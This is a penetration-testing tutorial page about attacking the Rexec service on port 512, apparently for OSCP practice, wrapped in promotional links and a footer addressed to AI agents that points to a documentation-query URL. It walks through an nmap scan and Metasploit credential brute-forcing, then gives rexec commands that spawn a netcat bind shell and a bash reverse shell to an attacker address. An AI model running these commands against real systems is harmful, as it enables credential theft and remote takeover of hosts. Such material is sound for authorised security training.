# Rexec - Port 512

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
  {% endtab %}
  {% endtabs %}

## Basic Info <a href="#basic-information" id="basic-information"></a>

It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password).

**Default Port:** 512

```
PORT    STATE SERVICE
512/tcp open  exec
```

## Scanning for Hosts

Start by using Nmap to scan for hosts with port 512 open, which is the default port for Rexec:

```
nmap -sT -p 512 <target_ip_range>
```

This will help identify potential targets with the Rexec service running.

## Brute-Forcing Credentials

Use Metasploit's auxiliary/scanner/rservices/rexec\_login module to brute-force username and password combinations:

Load the module:

```
use auxiliary/scanner/rservices/rexec_login
```

Set the target and options, such as username and password files:

```
set RHOSTS <target_ip> 
set USER_FILE /path/to/usernames.txt 
set PASS_FILE /path/to/passwords.txt
run
```

This will attempt to find valid credentials, exploiting Rexec's clear-text password vulnerability.

## Exploiting with Command Execution

Once credentials are obtained, use the rexec command to execute a backdoor command. For example, start a netcat listener:

```
rexec -l username -p password rhost "nc -l -p 1234 -e /bin/bash"
```

Then, connect to the backdoor:

```
nc -lnvp 1234
```

Alternatively, set up a reverse shell:

```
rexec -l username -p password rhost "bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'"
```

***

{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com/)

<details>

<summary>Support VeryLazyTech 🎉</summary>

Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/network-pentesting/rexec-port-512.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.